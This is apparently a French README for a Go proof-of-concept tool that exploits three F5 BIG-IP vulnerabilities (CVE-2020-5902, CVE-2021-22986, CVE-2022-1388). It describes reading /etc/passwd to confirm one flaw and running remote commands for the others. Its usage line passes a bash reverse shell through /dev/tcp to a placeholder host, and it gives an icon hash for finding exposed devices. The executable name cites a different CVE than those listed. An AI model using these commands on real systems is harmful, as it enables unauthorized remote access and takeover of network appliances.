
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 collection de POC
Écrit en Go, collection de POC pour CVE-2020-5902, CVE-2021-22986, CVE-2022-1388. D'autres POC F5 seront ajoutés ultérieurement.
Auteur : 160team.west9B
Réservé aux chercheurs en sécurité pour une utilisation autorisée. Respectez la loi sur la cybersécurité. Toute conséquence découlant de son utilisation incombe à l'utilisateur, et non à l'auteur.
Collection de POC F5 :
CVE-2020-5902 : Vulnérabilité d'exécution de code à distance sur F5 BIG-IP
CVE-2021-22986 : Vulnérabilité d'exécution de commande à distance non autorisée via iControl REST sur F5 BIG-IP
CVE-2022-1388 : Contournement d'authentification menant à une exécution de commande à distance
Vérification de CVE-2020-5902 via un téléchargement de fichier arbitraire. Si /etc/passwd est renvoyé, la vulnérabilité existe.
Pour CVE-2021-22986 et CVE-2022-1388, le POC exécute par défaut la commande id. Si {id} est renvoyé, la vulnérabilité existe. Utilisez -c pour personnaliser la commande.
utilisation : ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"